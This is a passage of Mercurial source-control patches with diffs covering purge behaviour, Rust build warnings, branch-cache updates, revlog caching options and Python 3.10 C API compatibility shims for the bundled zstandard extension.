href="/help/purge"> + purge + </a> + </td><td> + removes files not tracked by Mercurial + </td></tr> + <tr><td> <a href="/help/recover"> recover </a> diff --git a/tests/test-hgweb-json.t b/tests/test-hgweb-json.t --- a/tests/test-hgweb-json.t +++ b/tests/test-hgweb-json.t @@ -2190,6 +2190,10 @@ "topic": "phase" }, { + "summary": "removes files not tracked by Mercurial", + "topic": "purge" + }, + { "summary": "roll back an interrupted transaction", "topic": "recover" }, diff --git a/tests/test-purge.t b/tests/test-purge.t --- a/tests/test-purge.t +++ b/tests/test-purge.t @@ -1,8 +1,3 @@ - $ cat <<EOF >> $HGRCPATH - > [extensions] - > purge = - > EOF - init $ hg init t @@ -18,6 +13,26 @@ $ echo 'ignored' > .hgignore $ hg ci -qAmr3 -d'2 0' +purge without the extension + + $ hg st + $ touch foo + $ hg purge + permanently delete 1 unkown files? (yN) n + abort: removal cancelled + [250] + $ hg st + ? foo + $ hg purge --no-confirm + $ hg st + +now enabling the extension + + $ cat <<EOF >> $HGRCPATH + > [extensions] + > purge = + > EOF + delete an empty directory $ mkdir empty_dir # HG changeset patch # User Dan Villiom Podlaski Christiansen <danchr@gmail.com> # Date 1611310239 -3600 # Fri Jan 22 11:10:39 2021 +0100 # Node ID cabc5e9366c55ac4c446e474f00dd593dd5e5816 # Parent bb3a5c0df06b2cb1bc3a01b850d69113d9818f5f rust: lower compile error on non-linux platforms to a warning As discussed on D9671#146704 this lowers the error to a warning. Differential Revision: https://phab.mercurial-scm.org/D9852 diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -30,14 +30,6 @@ pub mod operations; pub mod utils; -// Remove this to see (potential) non-artificial compile failures. 
MacOS -// *should* compile, but fail to compile tests for example as of 2020-03-06 -#[cfg(not(target_os = "linux"))] -compile_error!( - "`hg-core` has only been tested on Linux and will most \ - likely not behave correctly on other platforms." -); - use crate::utils::hg_path::{HgPathBuf, HgPathError}; pub use filepatterns::{ parse_pattern_syntax, read_pattern_file, IgnorePattern, diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -609,6 +609,12 @@ # and its build is not explictely disabled (for external build # as Linux distributions would do) if self.distribution.rust and self.rust: + if not sys.platform.startswith('linux'): + self.warn( + "rust extensions have only been tested on Linux " + "and may not behave correctly on other platforms" + ) + for rustext in ruststandalones: rustext.build('' if self.inplace else self.build_lib) # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1610670608 -3600 # Fri Jan 15 01:30:08 2021 +0100 # Node ID cad17d50736ca5bd3ba83b82697461a2cf646fdc # Parent cabc5e9366c55ac4c446e474f00dd593dd5e5816 changelog: move branchinfo to changelogrevision The function parses the extra dictionary after looking up the changelogrevision. To avoid duplicated look up, it is better to provide it as property of changelogrevision instead. Keep the function for a release cycle as at least the topic extension depends on it. 
Differential Revision: https://phab.mercurial-scm.org/D9779 diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -200,6 +200,7 @@ p1copies = attr.ib(default=None) p2copies = attr.ib(default=None) description = attr.ib(default=b'') + branchinfo = attr.ib(default=(_defaultextra[b'branch'], False)) class changelogrevision(object): @@ -372,6 +373,11 @@ def description(self): return encoding.tolocal(self._text[self._offsets[3] + 2 :]) + @property + def branchinfo(self): + extra = self.extra + return encoding.tolocal(extra.get(b"branch")), b'close' in extra + class changelog(revlog.revlog): def __init__(self, opener, trypending=False): @@ -601,8 +607,7 @@ This function exists because creating a changectx object just to access this is costly.""" - extra = self.changelogrevision(rev).extra - return encoding.tolocal(extra.get(b"branch")), b'close' in extra + return self.changelogrevision(rev).branchinfo def _nodeduplicatecallback(self, transaction, node): # keep track of revisions that got "re-added", eg: unbunde of know rev. diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -65,4 +65,5 @@ == Internal API Changes == - + * `changelog.branchinfo` is deprecated and will be removed after 5.8. + It is superseded by `changelogrevision.branchinfo`. # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611012053 -3600 # Tue Jan 19 00:20:53 2021 +0100 # Node ID 0903d6b9b1dfc66f52fcb5794a71a2cde22313ef # Parent cad17d50736ca5bd3ba83b82697461a2cf646fdc repository: introduce register_changeset callback The new callback is called whenever a changeset is added to the repository (commit, unbundle or exchange). Since the bulk operations already parse the changeset (readfiles or full changesetrevision), always use the latter to avoid redundant lookups. The first consumer of the new interface needs to look at extra. 
Differential Revision: https://phab.mercurial-scm.org/D9780 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -323,7 +323,10 @@ cgnodes.append(node) def onchangelog(cl, node): - efilesset.update(cl.readfiles(node)) + rev = cl.rev(node) + ctx = cl.changelogrevision(rev) + efilesset.update(ctx.files) + repo.register_changeset(rev, ctx) self.changelogheader() deltas = self.deltaiter() diff --git a/mercurial/commit.py b/mercurial/commit.py --- a/mercurial/commit.py +++ b/mercurial/commit.py @@ -97,6 +97,9 @@ extra, ) rev = repo[n].rev() + if oldtip != repo.changelog.tiprev(): + repo.register_changeset(rev, repo.changelog.changelogrevision(rev)) + xp1, xp2 = p1.hex(), p2 and p2.hex() or b'' repo.hook( b'pretxncommit', diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -372,6 +372,8 @@ # so we can set the linkrev accordingly when manifests are added. manifestnodes[rev] = revision.manifest + repo.register_changeset(rev, revision) + nodesbyphase = {phase: set() for phase in phases.phasenames.values()} remotebookmarks = {} diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -1641,6 +1641,14 @@ def revbranchcache(): pass + def register_changeset(rev, changelogrevision): + """Extension point for caches for new nodes. + + Multiple consumers are expected to need parts of the changelogrevision, + so it is provided as optimization to avoid duplicate lookups. 
A simple + cache would be fragile when other revisions are accessed, too.""" + pass + def branchtip(branchtip, ignoremissing=False): """Return the tip node for a given branch.""" diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -2062,6 +2062,9 @@ self._revbranchcache = branchmap.revbranchcache(self.unfiltered()) return self._revbranchcache + def register_changeset(self, rev, changelogrevision): + pass + def branchtip(self, branch, ignoremissing=False): """return the tip node for a given branch # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1610672339 -3600 # Fri Jan 15 01:58:59 2021 +0100 # Node ID 3e91d9978becaca67812d6ce38f14fcbeddbeea2 # Parent 0903d6b9b1dfc66f52fcb5794a71a2cde22313ef branchmap: update rev-branch-cache incrementally Historically, the revision to branch mapping cache was updated on demand and shared via bundle2 to avoid the cost of rebuilding on first use. Use the new `register_changeset` callback and update rbc directly on every change. Make the transfer of the bundle part redundant, but keep it for the moment to avoid the test churn. Over all, "hg unbundle" for large bundles is less than 1.8% slower for different larger repositories and that seems to a reasonable trade off. 
Differential Revision: https://phab.mercurial-scm.org/D9781 diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -706,8 +706,10 @@ self._setcachedata(rev, reponode, branchidx) return b, close - def setdata(self, branch, rev, node, close): + def setdata(self, rev, changelogrevision): """add new data information to the cache""" + branch, close = changelogrevision.branchinfo + if branch in self._namesreverse: branchidx = self._namesreverse[branch] else: @@ -716,7 +718,7 @@ self._namesreverse[branch] = branchidx if close: branchidx |= _rbccloseflag - self._setcachedata(rev, node, branchidx) + self._setcachedata(rev, self._repo.changelog.node(rev), branchidx) # If no cache data were readable (non exists, bad permission, etc) # the cache was bypassing itself by setting: # diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -2478,35 +2478,10 @@ @parthandler(b'cache:rev-branch-cache') def handlerbc(op, inpart): - """receive a rev-branch-cache payload and update the local cache - - The payload is a series of data related to each branch - - 1) branch name length - 2) number of open heads - 3) number of closed heads - 4) open heads nodes - 5) closed heads nodes - """ - total = 0 - rawheader = inpart.read(rbcstruct.size) - cache = op.repo.revbranchcache() - cl = op.repo.unfiltered().changelog - while rawheader: - header = rbcstruct.unpack(rawheader) - total += header[1] + header[2] - utf8branch = inpart.read(header[0]) - branch = encoding.tolocal(utf8branch) - for x in pycompat.xrange(header[1]): - node = inpart.read(20) - rev = cl.rev(node) - cache.setdata(branch, rev, node, False) - for x in pycompat.xrange(header[2]): - node = inpart.read(20) - rev = cl.rev(node) - cache.setdata(branch, rev, node, True) - rawheader = inpart.read(rbcstruct.size) - cache.write() + """Legacy part, ignored for compatibility with bundles from or + for Mercurial 
before 5.7. Newer Mercurial computes the cache + efficiently enough during unbundling that the additional transfer + is unnecessary.""" @parthandler(b'pushvars') diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -2063,7 +2063,7 @@ return self._revbranchcache def register_changeset(self, rev, changelogrevision): - pass + self.revbranchcache().setdata(rev, changelogrevision) def branchtip(self, branch, ignoremissing=False): """return the tip node for a given branch diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -44,6 +44,9 @@ * The `branchmap` cache is updated more intelligently and can be significantly faster for repositories with many branches and changesets. + * The `rev-branch-cache` is now updated incrementally whenever changesets + are added. + == New Experimental Features == diff --git a/tests/test-acl.t b/tests/test-acl.t --- a/tests/test-acl.t +++ b/tests/test-acl.t @@ -204,6 +204,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -283,6 +284,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -806,6 +808,7 @@ acl: acl.deny.bookmarks not enabled acl: bookmark access granted: "ef1ea85a6374b77d6da9dcda9541f498f2d17df7" on bookmark "moving-bookmark" bundle2-input-bundle: 7 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache invalid branch cache (served.hidden): tip differs added 1 changesets with 1 changes to 1 files @@ -982,6 +985,7 @@ bundle2-input-part: "phase-heads" 
supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1318,6 +1322,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1408,6 +1413,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total @@ -1577,6 +1583,7 @@ bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 5 parts total + truncating cache/rbc-revs-v1 to 8 updating the branch cache added 3 changesets with 3 changes to 3 files bundle2-output-bundle: "HG20", 1 parts total diff --git a/tests/test-inherit-mode.t b/tests/test-inherit-mode.t --- a/tests/test-inherit-mode.t +++ b/tests/test-inherit-mode.t @@ -134,6 +134,8 @@ 00660 ../push/.hg/00changelog.i 00770 ../push/.hg/cache/ 00660 ../push/.hg/cache/branch2-base + 00660 ../push/.hg/cache/rbc-names-v1 + 00660 ../push/.hg/cache/rbc-revs-v1 00660 ../push/.hg/dirstate 00660 ../push/.hg/requires 00770 ../push/.hg/store/ diff --git a/tests/test-rebase-conflicts.t b/tests/test-rebase-conflicts.t --- a/tests/test-rebase-conflicts.t +++ b/tests/test-rebase-conflicts.t @@ -318,10 +318,10 @@ bundle2-input-part: total payload size 1686 bundle2-input-part: "cache:rev-branch-cache" (advisory) supported bundle2-input-part: total payload size 74 - truncating cache/rbc-revs-v1 to 56 bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 3 
parts total + truncating cache/rbc-revs-v1 to 72 added 2 changesets with 2 changes to 1 files updating the branch cache invalid branch cache (served): tip differs # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1611150433 -3600 # Wed Jan 20 14:47:13 2021 +0100 # Node ID 711ba0f1057e5fd1a229ce3c120c6817519bf300 # Parent 3e91d9978becaca67812d6ce38f14fcbeddbeea2 revlog: decouple caching from addrevision callback for addgroup For changesets, it is useful to cache the content as it will almost always be processed afterwards. For manifests on the other hand, the content is often not used directly as there is a fast path for deltas. Explicitly disable the cache in exchangev2's manifest handling for that reason. Differential Revision: https://phab.mercurial-scm.org/D9847 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -334,6 +334,7 @@ deltas, csmap, trp, + alwayscache=True, addrevisioncb=onchangelog, duplicaterevisioncb=ondupchangelog, ): diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -423,6 +423,7 @@ iterrevisions(), linkrev, weakref.proxy(tr), + alwayscache=True, addrevisioncb=onchangeset, duplicaterevisioncb=ondupchangeset, ) diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -769,7 +769,13 @@ ``nullid``, in which case the header from the delta can be ignored and the delta used as the fulltext. + ``alwayscache`` instructs the lower layers to cache the content of the + newly added revision, even if it needs to be explicitly computed. + This used to be the default when ``addrevisioncb`` was provided up to + Mercurial 5.8. + ``addrevisioncb`` should be called for each node as it is committed. + ``duplicaterevisioncb`` should be called for each pre-existing node. 
``maybemissingparents`` is a bool indicating whether the incoming data may reference parents/ancestor revisions that aren't present. diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1836,6 +1836,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, ): @@ -1843,6 +1844,7 @@ deltas, linkmapper, transaction, + alwayscache=alwayscache, addrevisioncb=addrevisioncb, duplicaterevisioncb=duplicaterevisioncb, ) diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2375,6 +2375,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, ): @@ -2475,7 +2476,7 @@ (baserev, delta), ifh, dfh, - alwayscache=bool(addrevisioncb), + alwayscache=alwayscache, deltacomputer=deltacomputer, ) diff --git a/mercurial/unionrepo.py b/mercurial/unionrepo.py --- a/mercurial/unionrepo.py +++ b/mercurial/unionrepo.py @@ -128,6 +128,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, maybemissingparents=False, # HG changeset patch # User Victor Stinner <vstinner@python.org> # Date 1607939069 -3600 # Mon Dec 14 10:44:29 2020 +0100 # Node ID e92ca942ddca2b10cd9ae1321dd0193203ca4d25 # Parent 711ba0f1057e5fd1a229ce3c120c6817519bf300 cext: add Python 3.10 support * Replace "Py_TYPE(obj) = type;" with "Py_SET_TYPE(obj, type);" * Add pythoncapi_compat.h header file to get Py_SET_TYPE() on Python 2.7-3.8. Header file added to mercurial/ and contrib/python-zstandard/zstd/common/. In Python 3.10, Py_TYPE(obj) must not longer be used as an l-value. 
pythoncapi_compat.h comes from: https://github.com/pythoncapi/pythoncapi_compat Differential Revision: https://phab.mercurial-scm.org/D9825 diff --git a/contrib/clang-format-ignorelist b/contrib/clang-format-ignorelist --- a/contrib/clang-format-ignorelist +++ b/contrib/clang-format-ignorelist @@ -9,3 +9,4 @@ hgext/fsmonitor/pywatchman/**.c mercurial/thirdparty/**.c mercurial/thirdparty/**.h +mercurial/pythoncapi_compat.h diff --git a/contrib/python-zstandard/c-ext/bufferutil.c b/contrib/python-zstandard/c-ext/bufferutil.c --- a/contrib/python-zstandard/c-ext/bufferutil.c +++ b/contrib/python-zstandard/c-ext/bufferutil.c @@ -758,7 +758,7 @@ }; void bufferutil_module_init(PyObject* mod) { - Py_TYPE(&ZstdBufferWithSegmentsType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferWithSegmentsType, &PyType_Type); if (PyType_Ready(&ZstdBufferWithSegmentsType) < 0) { return; } @@ -766,7 +766,7 @@ Py_INCREF(&ZstdBufferWithSegmentsType); PyModule_AddObject(mod, "BufferWithSegments", (PyObject*)&ZstdBufferWithSegmentsType); - Py_TYPE(&ZstdBufferSegmentsType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferSegmentsType, &PyType_Type); if (PyType_Ready(&ZstdBufferSegmentsType) < 0) { return; } @@ -774,7 +774,7 @@ Py_INCREF(&ZstdBufferSegmentsType); PyModule_AddObject(mod, "BufferSegments", (PyObject*)&ZstdBufferSegmentsType); - Py_TYPE(&ZstdBufferSegmentType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferSegmentType, &PyType_Type); if (PyType_Ready(&ZstdBufferSegmentType) < 0) { return; } @@ -782,7 +782,7 @@ Py_INCREF(&ZstdBufferSegmentType); PyModule_AddObject(mod, "BufferSegment", (PyObject*)&ZstdBufferSegmentType); - Py_TYPE(&ZstdBufferWithSegmentsCollectionType) = &PyType_Type; + Py_SET_TYPE(&ZstdBufferWithSegmentsCollectionType, &PyType_Type); if (PyType_Ready(&ZstdBufferWithSegmentsCollectionType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionchunker.c b/contrib/python-zstandard/c-ext/compressionchunker.c --- a/contrib/python-zstandard/c-ext/compressionchunker.c +++ 
b/contrib/python-zstandard/c-ext/compressionchunker.c @@ -348,12 +348,12 @@ }; void compressionchunker_module_init(PyObject* module) { - Py_TYPE(&ZstdCompressionChunkerIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionChunkerIteratorType, &PyType_Type); if (PyType_Ready(&ZstdCompressionChunkerIteratorType) < 0) { return; } - Py_TYPE(&ZstdCompressionChunkerType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionChunkerType, &PyType_Type); if (PyType_Ready(&ZstdCompressionChunkerType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressiondict.c b/contrib/python-zstandard/c-ext/compressiondict.c --- a/contrib/python-zstandard/c-ext/compressiondict.c +++ b/contrib/python-zstandard/c-ext/compressiondict.c @@ -400,7 +400,7 @@ }; void compressiondict_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionDictType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionDictType, &PyType_Type); if (PyType_Ready(&ZstdCompressionDictType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionparams.c b/contrib/python-zstandard/c-ext/compressionparams.c --- a/contrib/python-zstandard/c-ext/compressionparams.c +++ b/contrib/python-zstandard/c-ext/compressionparams.c @@ -556,7 +556,7 @@ }; void compressionparams_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionParametersType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionParametersType, &PyType_Type); if (PyType_Ready(&ZstdCompressionParametersType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressionreader.c b/contrib/python-zstandard/c-ext/compressionreader.c --- a/contrib/python-zstandard/c-ext/compressionreader.c +++ b/contrib/python-zstandard/c-ext/compressionreader.c @@ -811,7 +811,7 @@ void compressionreader_module_init(PyObject* mod) { /* TODO make reader a sub-class of io.RawIOBase */ - Py_TYPE(&ZstdCompressionReaderType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionReaderType, &PyType_Type); if (PyType_Ready(&ZstdCompressionReaderType) < 0) { return; } diff 
--git a/contrib/python-zstandard/c-ext/compressionwriter.c b/contrib/python-zstandard/c-ext/compressionwriter.c --- a/contrib/python-zstandard/c-ext/compressionwriter.c +++ b/contrib/python-zstandard/c-ext/compressionwriter.c @@ -365,7 +365,7 @@ }; void compressionwriter_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressionWriterType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionWriterType, &PyType_Type); if (PyType_Ready(&ZstdCompressionWriterType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressobj.c b/contrib/python-zstandard/c-ext/compressobj.c --- a/contrib/python-zstandard/c-ext/compressobj.c +++ b/contrib/python-zstandard/c-ext/compressobj.c @@ -249,7 +249,7 @@ }; void compressobj_module_init(PyObject* module) { - Py_TYPE(&ZstdCompressionObjType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressionObjType, &PyType_Type); if (PyType_Ready(&ZstdCompressionObjType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressor.c b/contrib/python-zstandard/c-ext/compressor.c --- a/contrib/python-zstandard/c-ext/compressor.c +++ b/contrib/python-zstandard/c-ext/compressor.c @@ -619,7 +619,7 @@ goto finally; } - Py_SIZE(output) = outBuffer.pos; + Py_SET_SIZE(output, outBuffer.pos); finally: PyBuffer_Release(&source); @@ -1659,7 +1659,7 @@ }; void compressor_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressorType, &PyType_Type); if (PyType_Ready(&ZstdCompressorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressoriterator.c b/contrib/python-zstandard/c-ext/compressoriterator.c --- a/contrib/python-zstandard/c-ext/compressoriterator.c +++ b/contrib/python-zstandard/c-ext/compressoriterator.c @@ -228,7 +228,7 @@ }; void compressoriterator_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressorIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressorIteratorType, &PyType_Type); if (PyType_Ready(&ZstdCompressorIteratorType) < 0) { return; } diff --git 
a/contrib/python-zstandard/c-ext/decompressionreader.c b/contrib/python-zstandard/c-ext/decompressionreader.c --- a/contrib/python-zstandard/c-ext/decompressionreader.c +++ b/contrib/python-zstandard/c-ext/decompressionreader.c @@ -774,7 +774,7 @@ void decompressionreader_module_init(PyObject* mod) { /* TODO make reader a sub-class of io.RawIOBase */ - Py_TYPE(&ZstdDecompressionReaderType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionReaderType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionReaderType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressionwriter.c b/contrib/python-zstandard/c-ext/decompressionwriter.c --- a/contrib/python-zstandard/c-ext/decompressionwriter.c +++ b/contrib/python-zstandard/c-ext/decompressionwriter.c @@ -288,7 +288,7 @@ }; void decompressionwriter_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressionWriterType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionWriterType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionWriterType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressobj.c b/contrib/python-zstandard/c-ext/decompressobj.c --- a/contrib/python-zstandard/c-ext/decompressobj.c +++ b/contrib/python-zstandard/c-ext/decompressobj.c @@ -195,7 +195,7 @@ }; void decompressobj_module_init(PyObject* module) { - Py_TYPE(&ZstdDecompressionObjType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionObjType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionObjType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressor.c b/contrib/python-zstandard/c-ext/decompressor.c --- a/contrib/python-zstandard/c-ext/decompressor.c +++ b/contrib/python-zstandard/c-ext/decompressor.c @@ -1811,7 +1811,7 @@ }; void decompressor_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressorType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressorType, &PyType_Type); if (PyType_Ready(&ZstdDecompressorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressoriterator.c 
b/contrib/python-zstandard/c-ext/decompressoriterator.c --- a/contrib/python-zstandard/c-ext/decompressoriterator.c +++ b/contrib/python-zstandard/c-ext/decompressoriterator.c @@ -242,7 +242,7 @@ }; void decompressoriterator_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressorIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressorIteratorType, &PyType_Type); if (PyType_Ready(&ZstdDecompressorIteratorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/frameparams.c b/contrib/python-zstandard/c-ext/frameparams.c --- a/contrib/python-zstandard/c-ext/frameparams.c +++ b/contrib/python-zstandard/c-ext/frameparams.c @@ -128,7 +128,7 @@ }; void frameparams_module_init(PyObject* mod) { - Py_TYPE(&FrameParametersType) = &PyType_Type; + Py_SET_TYPE(&FrameParametersType, &PyType_Type); if (PyType_Ready(&FrameParametersType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/python-zstandard.h b/contrib/python-zstandard/c-ext/python-zstandard.h --- a/contrib/python-zstandard/c-ext/python-zstandard.h +++ b/contrib/python-zstandard/c-ext/python-zstandard.h @@ -9,6 +9,7 @@ #define PY_SSIZE_T_CLEAN #include <Python.h> #include "structmember.h" +#include <pythoncapi_compat.h> #define ZSTD_STATIC_LINKING_ONLY #define ZDICT_STATIC_LINKING_ONLY diff --git a/contrib/python-zstandard/zstd/common/pythoncapi_compat.h b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h new file mode 100644 --- /dev/null +++ b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h @@ -0,0 +1,278 @@ +// Header file providing new functions of the Python C API to old Python +// versions. +// +// File distributed under the MIT license. 
+// +// Homepage: +// https://github.com/pythoncapi/pythoncapi_compat +// +// Latest version: +// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h + +#ifndef PYTHONCAPI_COMPAT +#define PYTHONCAPI_COMPAT + +#ifdef __cplusplus +extern "C" { +#endif + +#include <Python.h> +#include "frameobject.h" // PyFrameObject, PyFrame_GetBack() + + +// Cast argument to PyObject* type. +#ifndef _PyObject_CAST +# define _PyObject_CAST(op) ((PyObject*)(op)) +#endif + + +// bpo-42262 added Py_NewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef) +static inline PyObject* _Py_NewRef(PyObject *obj) +{ + Py_INCREF(obj); + return obj; +} +#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-42262 added Py_XNewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef) +static inline PyObject* _Py_XNewRef(PyObject *obj) +{ + Py_XINCREF(obj); + return obj; +} +#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT) +static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt) +{ + ob->ob_refcnt = refcnt; +} +#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt) +#endif + + +// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE) +static inline void +_Py_SET_TYPE(PyObject *ob, PyTypeObject *type) +{ + ob->ob_type = type; +} +#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type) +#endif + + +// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE) +static inline void +_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size) +{ + ob->ob_size = size; +} +#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size) +#endif + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 
+static inline PyCodeObject* +PyFrame_GetCode(PyFrameObject *frame) +{ + PyCodeObject *code; + assert(frame != NULL); + code = frame->f_code; + assert(code != NULL); + Py_INCREF(code); + return code; +} +#endif + +static inline PyCodeObject* +_PyFrame_GetCodeBorrow(PyFrameObject *frame) +{ + PyCodeObject *code = PyFrame_GetCode(frame); + Py_DECREF(code); + return code; // borrowed reference +} + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyFrame_GetBack(PyFrameObject *frame) +{ + PyFrameObject *back; + assert(frame != NULL); + back = frame->f_back; + Py_XINCREF(back); + return back; +} +#endif + +static inline PyFrameObject* +_PyFrame_GetBackBorrow(PyFrameObject *frame) +{ + PyFrameObject *back = PyFrame_GetBack(frame); + Py_XDECREF(back); + return back; // borrowed reference +} + + +// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyThreadState_GetInterpreter(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->interp; +} +#endif + + +// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static 